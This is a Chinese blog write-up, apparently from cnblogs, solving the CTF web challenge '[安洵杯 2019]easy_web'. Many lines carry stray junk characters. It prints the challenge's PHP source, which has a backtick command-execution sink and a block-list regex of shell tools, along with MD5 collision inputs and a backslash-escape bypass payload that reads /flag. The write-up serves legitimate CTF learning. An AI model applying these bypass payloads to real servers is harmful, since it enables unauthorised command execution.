[安洵杯 2019]easy_web

admin

3 J6 b8 m& Z5 G- Z8 F2 Z<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>
5 `7 m3 \3 O- B: A2 R<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;题目打开如下，?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd=，同时查看源代码</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
! i) ?2 k6 g/ r6 j<p>这里有个MD5 is funny，说明这个题目大概率跟MD5有关</p>
<p>然后我抓包了一下，消息头里面没有什么特殊的东西，于是我尝试从url入手</p>
<p>首先把那个进行一次base64位解码</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>
: D/ H9 y% q. M0 m$ v8 \6 p. p$ s<p>&nbsp;</p>
4 f/ X7 F& m2 i9 v<p>&nbsp;</p>
4 C, r) S7 Y+ ?<p>&nbsp;解码一次以后还是很像base64编码，于是又解码一次</p>
* o' x+ q: e- c! I0 k, o4 f<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;然后用hex解码一下得到了</p>
7 N" e4 C7 j* Q/ c% H* n<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">555.png
4 b, S/ @* N& N8 Q0 |</pre>
</div>
<p>　　用同样的方法把index.php进行加密</p>
<div class="cnblogs_Highlighter">
$ j8 e, d6 t. d+ W8 O<pre class="brush:sql;gutter:true;">TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
</pre>
</div>
9 f- y, O+ ?! M* r  b; X<p>　　然后输入到地址栏</p>
, s/ E$ ]" ]# L+ n8 z7 j<p>&nbsp;然后查看源代码，把源代码里面的那一串base64的编码解码</p>
# C3 a' x& i) I7 E8 _# n- c<div class="cnblogs_code">
<pre>&lt;?<span style="color: rgba(0, 0, 0, 1)">php
- P6 s+ s, [; s' N+ q</span><span style="color: rgba(0, 128, 128, 1)">error_reporting</span>(<span style="color: rgba(255, 0, 255, 1)">E_ALL</span> || ~ <span style="color: rgba(255, 0, 255, 1)">E_NOTICE</span><span style="color: rgba(0, 0, 0, 1)">);
</span><span style="color: rgba(0, 128, 128, 1)">header</span>('content-type:text/html;charset=utf-8'<span style="color: rgba(0, 0, 0, 1)">);
4 E" \" j- y( q# g</span><span style="color: rgba(128, 0, 128, 1)">$cmd</span> = <span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">];
  S" Y, S, \6 _7 W! _( D% H1 D. h5 W# e</span><span style="color: rgba(0, 0, 255, 1)">if</span> (!<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img']) || !<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">]))
1 [, z/ p* ]% f5 U) i- L, \; L    </span><span style="color: rgba(0, 128, 128, 1)">header</span>('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd='<span style="color: rgba(0, 0, 0, 1)">);
</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = hex2bin(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img'<span style="color: rgba(0, 0, 0, 1)">])));
1 X* x: V1 x! O2 M0 o! ~/ n
</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = <span style="color: rgba(0, 128, 128, 1)">preg_replace</span>("/[^a-zA-Z0-9.]+/", "", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">);
+ G% j; d, L6 f  A6 a0 w. x</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/flag/i", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">)) {
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> '&lt;img src ="./ctf3.jpeg"&gt;'<span style="color: rgba(0, 0, 0, 1)">;
    </span><span style="color: rgba(0, 0, 255, 1)">die</span>("xixi～ no flag"<span style="color: rgba(0, 0, 0, 1)">);
} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
    </span><span style="color: rgba(128, 0, 128, 1)">$txt</span> = <span style="color: rgba(0, 128, 128, 1)">base64_encode</span>(<span style="color: rgba(0, 128, 128, 1)">file_get_contents</span>(<span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">));
9 d* l" m  C/ S6 Y3 j6 {$ [) n    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;img src='data:image/gif;base64," . <span style="color: rgba(128, 0, 128, 1)">$txt</span> . "'&gt;&lt;/img&gt;"<span style="color: rgba(0, 0, 0, 1)">;
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
}
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">;
2 a# y. Z8 [! z</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
& l' W3 V1 f1 }  A: z</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&amp;[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|&lt;|&gt;/i", <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">)) {
& r  h8 f( w( H    </span><span style="color: rgba(0, 0, 255, 1)">echo</span>("forbid ~"<span style="color: rgba(0, 0, 0, 1)">);
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
    </span><span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] &amp;&amp; <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
    } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
4 L2 O0 i4 Q- k/ x  O; T9 {5 Y        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
    }
: W9 B$ {1 I6 K3 t# ?; c; \0 c}

</span>?&gt;
9 ?3 b9 S$ ~) E' R. g  v* l. [&lt;html&gt;
1 p6 R, g) D' p- U1 e&lt;style&gt;<span style="color: rgba(0, 0, 0, 1)">
3 I$ V6 ]* _& R9 k- [; A, u  body{
   background</span>:url(./bj.png)  no-<span style="color: rgba(0, 0, 0, 1)">repeat center center;
2 ^; s1 }0 d- g8 y   background</span>-size:<span style="color: rgba(0, 0, 0, 1)">cover;
   background</span>-attachment:<span style="color: rgba(0, 0, 0, 1)">fixed;
   background</span>-color:<span style="color: rgba(0, 128, 0, 1)">#</span><span style="color: rgba(0, 128, 0, 1)">CCCCCC;</span>
<span style="color: rgba(0, 0, 0, 1)">}
</span>&lt;/style&gt;
&lt;body&gt;
) l( L, o5 q5 A# A9 r0 L. T9 ?+ ?7 Q&lt;/body&gt;
6 N. ?0 }* P5 [&lt;/html&gt;</pre>
</div>
* G6 i8 m  z( z$ \. _3 a<p>结合前面的推断，关键代码就在</p>
<div class="cnblogs_code">
<pre>    <span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] &amp;&amp; <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
, K% h; J1 t& u1 k; }# {; a        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
    } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
* ^# p6 p( T7 B    }</span></pre>
</div>
7 D$ x; b" S6 x/ {( ^<p>这种MD5是md5强碰撞</p>
+ i" }* \  W% Y<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
</pre>
</div>
( \, Y  O3 H  y: {) X<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
  B! w8 ], V) ?* ?2 |</pre>
) \9 @- }+ C: g0 ~" m</div>
<p>　　只需要这样就可以把cmd里面的当成命令来处理。</p>
% Z9 p5 Y- @; Z% k5 [; N  S<p>于是采用payload:</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>
<p>&nbsp;</p>
<p>&nbsp;因为'\'并没有被屏蔽所以可以这么绕过</p>
. n' w. C8 m2 ^+ i<p>ls和l\s在命令执行的时候结果是一样的。</p>
<p>然后发现根目录里面有/flag</p>
' }. h  N( R' y<p>于是payload:</p>
& x; d% ?$ o, h) O* g% Y  |<div class="cnblogs_Highlighter">
& \2 [& O3 T1 l/ ]- i# U% ]<pre class="brush:sql;gutter:true;">?cmd=ca\t%20/flag
/ O3 @" s1 \4 W</pre>
</div>
- Q5 _# m& U% L8 Q<p>　　对于这个题目，因为他没有屏蔽sort和dir</p>
<p>所以查看也可以用dir来代替ls，cat可以用sort来代替。</p>
- N% ~6 I0 h! g" _# g+ V<p>&nbsp;</p>
9 \7 Y; K4 W/ N- S: H( U